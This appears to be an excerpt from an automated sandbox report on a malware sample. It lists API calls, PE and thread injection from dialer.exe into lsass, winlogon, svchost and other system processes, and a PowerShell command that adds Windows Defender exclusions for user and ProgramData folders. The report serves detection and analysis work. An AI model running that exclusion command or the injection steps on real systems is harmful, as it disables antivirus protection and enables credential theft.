          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E0D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_0000025CE3E0D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E07D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,55_2_0000025CE3E07D90
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623898D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000002623898D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_0000026238987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_0000026238987D90
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E597D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_000002786E597D90
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E59D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_000002786E59D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFAD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_000001611FFAD2A4
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_000001611FFA7D90
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F38D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_0000027C0F38D2A4
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F387D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_0000027C0F387D90

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Allocates memory in foreign processes
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E858950000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140ADFC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DD590000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160C9B0000 protect: page execute and read and writeJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1E8589B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 140AE890000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195DE1A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1160C9E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257E1070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F28C1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CA97FD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2652E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 254A27A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24B87DA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 205FB3C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A205670000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18EC1F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25CE3BC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26238950000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2786E560000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1611FF70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27C0F350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B279570000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E70A460000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22D13110000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C8C580000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2825F1D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20BAEC90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C782530000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: A60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24066EB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181CEDB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A142790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195B6F30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1428DCA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DBF9DB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D76CCC0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A239D90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CFA390000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23FB7270000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DF53B50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 164E88A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25177B50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28D5D340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 24EB5E10000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20859990000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F153C20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D241D40000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16FADAD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 20E03070000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15204DB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 11C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175C5280000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22EF1B30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 261DE4D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 226D8930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13E5E930000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27234C50000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28543540000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 2B684340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CE69900000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 29283380000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 193FA700000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1CBD1BD0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28A84D30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 28571390000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2551B760000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 20C383F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 20C38E60000 protect: page execute and read and write
          Contains functionality to inject code into remote processes
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,14_2_0000000140001C88
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 5895273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: ADFC273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DD59273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 589B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AE89273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE1A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9E273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E107273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C1D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 97FD273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 652E273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A27A273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 87DA273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: FB3C273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 567273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C1F3273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E3BC273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 3895273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 6E56273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 1FF7273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F35273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7957273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A46273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1311273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C58273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5F1D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D9C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEC9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC1B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8253273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A6273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66EB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD9A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CEDB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4279273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B6F3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8DCA273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7373273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F9DB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CCC273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39D9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA39273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B727273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53B5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E88A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 77B5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D34273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B5E1273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5999273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53C2273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 41D4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ADAD273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 307273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 11C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C528273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 76AA273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F1B3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F34F273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE4D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7452273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9D0273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF8C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D893273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E93273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4412273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 97E3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC87273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 698D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 34C5273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4354273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8434273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5892273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6990273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8338273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA70273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1BD273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 84D3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7139273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1B76273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 383F273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 38E6273C
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160C9B0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140AE890000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DE1A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160C9E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 11C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
